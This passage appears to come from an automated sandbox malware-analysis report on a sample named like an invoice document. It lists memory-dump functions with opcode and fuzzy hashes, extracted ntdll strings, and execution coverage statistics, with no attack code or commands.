                                                                                                                                • Opcode Fuzzy Hash: 0116bcaff66f345e7189197605bd62892d53d3383e798495d7dfcf44c8500bf9
                                                                                                                                • Instruction Fuzzy Hash: 8990023120580403D34071594808747400597D0302F55C021B9164565EC6B5CA916A32
                                                                                                                                Function 01742F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f49e2efcd6434bc14cc592c6f10a3cf03e0ce1f1b47bb78df97726fe67756f7d
                                                                                                                                • Instruction ID: 5b4abe08ab875a5f8a05400da9b92f5498e99a493686bac73c1da1d4f85b77dc
                                                                                                                                • Opcode Fuzzy Hash: f49e2efcd6434bc14cc592c6f10a3cf03e0ce1f1b47bb78df97726fe67756f7d
                                                                                                                                • Instruction Fuzzy Hash: DF90023120580403D3407159481470B400597D0302F55C021B5164565DC6758A516A72
                                                                                                                                Function 01742E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 00225b690d9738ed9c8a45330fbf7c26e11e102e8604f9b5380223ace3c336e4
                                                                                                                                • Instruction ID: d39401f873f55f06f090da5160908848aae2a07448bf70ab6e44ad9cff5d48e4
                                                                                                                                • Opcode Fuzzy Hash: 00225b690d9738ed9c8a45330fbf7c26e11e102e8604f9b5380223ace3c336e4
                                                                                                                                • Instruction Fuzzy Hash: 8D90022130540403D342715944146064009D7D1345F95C022F5424565DC6758B53A633
                                                                                                                                Function 01742EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5fe14d0494f2fcc24fa4dfaff56d2b95d8117f1a8fe1fab1cc8716d52f939309
                                                                                                                                • Instruction ID: 44b4da7218f7e2ae0ec85098cec6baab14a16b783bf3f25d0382173f6cf7a9a9
                                                                                                                                • Opcode Fuzzy Hash: 5fe14d0494f2fcc24fa4dfaff56d2b95d8117f1a8fe1fab1cc8716d52f939309
                                                                                                                                • Instruction Fuzzy Hash: 3590026120580403D38075594804607400597D0302F55C021B6064565ECA798E516636
                                                                                                                                Function 01742EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4bf5cc6caf40b07c52229a2a24dfd25abfa62826de38b7bbf67d1e26869b8068
                                                                                                                                • Instruction ID: 4eacbea2538fd462fb719a57f08e68ae111f7e6d2b3615c2825ab135e8457837
                                                                                                                                • Opcode Fuzzy Hash: 4bf5cc6caf40b07c52229a2a24dfd25abfa62826de38b7bbf67d1e26869b8068
                                                                                                                                • Instruction Fuzzy Hash: 6690027120540403D38071594404746400597D0301F55C021B9064564EC6A98FD56B66
                                                                                                                                Function 01742E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c1f5eb8b7a54ac10fefdba9c23a55ec5efdead00b03e0f987e85c9255668b54
                                                                                                                                • Instruction ID: c78dd3200f13abad4ebd9ff50eee4167d4e3e2410b02eedf0c89e47569785aa5
                                                                                                                                • Opcode Fuzzy Hash: 3c1f5eb8b7a54ac10fefdba9c23a55ec5efdead00b03e0f987e85c9255668b54
                                                                                                                                • Instruction Fuzzy Hash: B090022160540503D34171594404616400A97D0241F95C032B5024565ECA758B92A632
                                                                                                                                Function 01743010 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a498ca4ced10380bf326da02517233d407ebcbf7ac81fb10ae4ee21692947ac0
                                                                                                                                • Instruction ID: a6d814e139fd7a830af2fee616fb0de071a24aec9476f140b10726e7d33fe013
                                                                                                                                • Opcode Fuzzy Hash: a498ca4ced10380bf326da02517233d407ebcbf7ac81fb10ae4ee21692947ac0
                                                                                                                                • Instruction Fuzzy Hash: FD90022120584443D38072594804B0F810597E1202F95C029B8156564CC9658A555B22
                                                                                                                                Function 01743090 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c43d94005eaadd8b5da04bfb9480ebe31b8cbb3d99dbb8e2583c6b48428bfbbf
                                                                                                                                • Instruction ID: 5f31d5440468c5cedad882dc1a94f153e09b284b45d4e1304582bead1b4be591
                                                                                                                                • Opcode Fuzzy Hash: c43d94005eaadd8b5da04bfb9480ebe31b8cbb3d99dbb8e2583c6b48428bfbbf
                                                                                                                                • Instruction Fuzzy Hash: FD90022124540803D380715984147074006D7D0601F55C021B4024564DC6668B656BB2
                                                                                                                                Function 017439B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 524b633ba3c977d04e67093ba9c9d8746fd7ecea47690b705800c6f8b7eff953
                                                                                                                                • Instruction ID: 2694b7ce6c947444e1268dde26464fa04e141b15a85dcea851e5ffbe5ac4b67b
                                                                                                                                • Opcode Fuzzy Hash: 524b633ba3c977d04e67093ba9c9d8746fd7ecea47690b705800c6f8b7eff953
                                                                                                                                • Instruction Fuzzy Hash: D590022124945103D390715D44046168005B7E0201F55C031B48145A4DC5A58A556722
                                                                                                                                Function 01743D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 54b125bab850c5d0e454afdab663b3117340c2f79e8746aecea5e6916de8106c
                                                                                                                                • Instruction ID: c7f15bbbb8d73fe7e6c2ea1c2e2b53f63e9b2a58576f0606236c3bc53674656e
                                                                                                                                • Opcode Fuzzy Hash: 54b125bab850c5d0e454afdab663b3117340c2f79e8746aecea5e6916de8106c
                                                                                                                                • Instruction Fuzzy Hash: 8890023520540403D75071595804646404697D0301F55D421B4424568DC6A48AA1A622
                                                                                                                                Function 01743D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fa8b777232d55bc4811dbc98b5c78ec5a033b00a3e87b6bf3331fb00b65fc6d5
                                                                                                                                • Instruction ID: c4fea80aecf9986e42121575a12d453a39a7df06411991bda978574dec51cef5
                                                                                                                                • Opcode Fuzzy Hash: fa8b777232d55bc4811dbc98b5c78ec5a033b00a3e87b6bf3331fb00b65fc6d5
                                                                                                                                • Instruction Fuzzy Hash: 6A90023120640143978072595804A4E810597E1302B95D425B4015564CC9648A615722
                                                                                                                                Function 01742C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                • Instruction ID: 3f432510085d59350e90f41cf2dcd2e379725e596ea9645a8c31b2eecff65d51
                                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                Function 01742890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: 5846e797edf3d9f7c5de31bcb92a1d108c719179ee55fdf7db5168f398840b9d
                                                                                                                                • Instruction ID: 0c2a454417ee1ac51f2df1e593369d0d54dfbe269c1900e23498d9d73cd9ee61
                                                                                                                                • Opcode Fuzzy Hash: 5846e797edf3d9f7c5de31bcb92a1d108c719179ee55fdf7db5168f398840b9d
                                                                                                                                • Instruction Fuzzy Hash: D551F6B6A00116BFDF11DFACD88097EFBB8BB08240B148269F569D7646D374DE10CBA0
                                                                                                                                Function 017B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                • Opcode ID: 2ddfc9abf36cc2ec0fe3b91222499790a5cb7f82cc2a9a710d96c7865bd34969
                                                                                                                                • Instruction ID: f7ee8878f97f8b71b31b7d9773a6a1f0130541d07ca89d734ae10c9bec2689fa
                                                                                                                                • Opcode Fuzzy Hash: 2ddfc9abf36cc2ec0fe3b91222499790a5cb7f82cc2a9a710d96c7865bd34969
                                                                                                                                • Instruction Fuzzy Hash: D251E471A00645AECB24DE5CCCD0ABFFBF9AF44200B148499E596D7646EBB8FE40C760
                                                                                                                                Function 01737630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Execute=1, xrefs: 01774713
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017746FC
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01774655
                                                                                                                                • ExecuteOptions, xrefs: 017746A0
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01774725
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01774787
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01774742
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: 1e79d365908ef3a21b5d2e045832c90f172d3c3ac6ef5a902e132d03695304f4
                                                                                                                                • Instruction ID: 45ddf20e4a6140f88e1c3439f34d55ef30441ad5269e5b7f2f921b3edf172582
                                                                                                                                • Opcode Fuzzy Hash: 1e79d365908ef3a21b5d2e045832c90f172d3c3ac6ef5a902e132d03695304f4
                                                                                                                                • Instruction Fuzzy Hash: 74513CB164021ABBEF15ABA8DC99FAEF7A8EF55310F0400DDD606A7182D7709A41DF50
                                                                                                                                Function 017D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                • Instruction ID: 186873baae7636f1d68c2792c503de3a7ec765761a5ba2776ba88c62c4085631
                                                                                                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                                • Instruction Fuzzy Hash: 71023370508346AFD709CF28C494A6BFBF5EFC8704F54892DBA898B264DB31E945CB52
                                                                                                                                Function 0174B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                • Instruction ID: 286007f0112c98751d04bbf9fa55e647e05b1deb9619d45a231460f21845294a
                                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                • Instruction Fuzzy Hash: 4581AD70A452499FEF2ACF6CC8917BEFBA6AF45320F18415AD861A7291C734DC408B92
                                                                                                                                Function 017B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                • Opcode ID: 4101079802464f0cbae07fb2baa95edfd1efc0d0770bbfb31c71d91eec135ad0
                                                                                                                                • Instruction ID: 18c6f82928a0eadbfb63d7342e0a524082e8cdf575fd80e31b1781df35059860
                                                                                                                                • Opcode Fuzzy Hash: 4101079802464f0cbae07fb2baa95edfd1efc0d0770bbfb31c71d91eec135ad0
                                                                                                                                • Instruction Fuzzy Hash: 5B21627AA0111DABDB10DF79DC84AFEFBF9EF54650F14011AEA05E3205E730E9028BA1
                                                                                                                                Function 0172F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 0177031E
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017702E7
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017702BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: 73a12993849bf70e5ede79bcd73259a583be8eb20be78324e3303528e5fce0df
                                                                                                                                • Instruction ID: dd2ca0c3aa7ac9a9b75a5b911360d5d90772c35ff7355b0c39c16051c9565a0c
                                                                                                                                • Opcode Fuzzy Hash: 73a12993849bf70e5ede79bcd73259a583be8eb20be78324e3303528e5fce0df
                                                                                                                                • Instruction Fuzzy Hash: 1EE189316087529FDB25CF28C884B2AFBF0EB85724F140A6DF5A58B2A1D774D946CB42
                                                                                                                                Function 0173BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 01777BAC
                                                                                                                                • RTL: Resource at %p, xrefs: 01777B8E
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01777B7F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                • Opcode ID: 14edade411ef187bf091bd77e5abb8e6f388f64a1e1412a8b486d36771ccbe0d
                                                                                                                                • Instruction ID: afb643c42df7bc87a1816de8e7e64a2796ab7423c36f8ebaae9f30f3178f2b5b
                                                                                                                                • Opcode Fuzzy Hash: 14edade411ef187bf091bd77e5abb8e6f388f64a1e1412a8b486d36771ccbe0d
                                                                                                                                • Instruction Fuzzy Hash: 5741E1313057039FDB24DE29C844B6AF7E5EF88720F000A2DFA5A9B691DB31E9058B91
                                                                                                                                Function 0173B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0177728C
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 017772C1
                                                                                                                                • RTL: Resource at %p, xrefs: 017772A3
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01777294
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                • Opcode ID: 66a59f1f42a76194fab4858cecef27a7350f9e294e3f1754e6a7be63dd117f2f
                                                                                                                                • Instruction ID: f3ad2301fd62f7dd5c91554658af0e41f45253c582ad69cde2716e9fc5d2b7a0
                                                                                                                                • Opcode Fuzzy Hash: 66a59f1f42a76194fab4858cecef27a7350f9e294e3f1754e6a7be63dd117f2f
                                                                                                                                • Instruction Fuzzy Hash: 4341F031704202ABCB24DE29CC45F6AF7B5FB94710F100619F965AB281DB20E85287D1
                                                                                                                                Function 017B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                • Opcode ID: 270fa5558cfebe4737466b281af7ac3205b34303393b1bfbd39845942da45e13
                                                                                                                                • Instruction ID: 8de9afabffbf18deaa659670652453f0f1da6ace4040e7e8d33b8a4eb2433d26
                                                                                                                                • Opcode Fuzzy Hash: 270fa5558cfebe4737466b281af7ac3205b34303393b1bfbd39845942da45e13
                                                                                                                                • Instruction Fuzzy Hash: 4A319872A01219AFDB20DF2DCC84BEEF7F8EF44610F544559E949E3205EB30AA458BA0
                                                                                                                                Function 01747D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                • Instruction ID: 466bd25eeb1db6767427df12dd434f3582f66292f1e2f479eb2835354a7d3599
                                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                • Instruction Fuzzy Hash: AF91D471E0021A9BEF38DF6DC881ABEFBA5FF44320F54461AE965E72C4D73099818B11
                                                                                                                                Function 01709126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                • Opcode ID: bb38004f2037f7dd33f05cda22e30149dffbcf9f2d5b9dbb59137eaef5916a1c
                                                                                                                                • Instruction ID: 22db77d6f31c5fb12887fbb15b1ca6096957c76bea70921cd1c62f594ee126bc
                                                                                                                                • Opcode Fuzzy Hash: bb38004f2037f7dd33f05cda22e30149dffbcf9f2d5b9dbb59137eaef5916a1c
                                                                                                                                • Instruction Fuzzy Hash: 6B812B71D01269DBDB72DB54CC44BEAB7B8AB48714F0041EAEA0DB7681D7705E85CFA0
                                                                                                                                Function 0178CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0178CFBD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                                • String ID: @$@4Cw@4Cw
                                                                                                                                • API String ID: 4062629308-3101775584
                                                                                                                                • Opcode ID: e87735552b5b29bc2e6cd4938ca40b45acb2dd7619a7bade95c017a5135bb883
                                                                                                                                • Instruction ID: a1739ad9d100a1b891d63e413e727f027c551b377c883b7c1bb9cabff6360804
                                                                                                                                • Opcode Fuzzy Hash: e87735552b5b29bc2e6cd4938ca40b45acb2dd7619a7bade95c017a5135bb883
                                                                                                                                • Instruction Fuzzy Hash: 4041A0B1940215DFDB31AFA9C844AAEFBB8FF55B50F10402EEA15EB299D730D901CB61

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:40
                                                                                                                                Total number of Limit Nodes:4
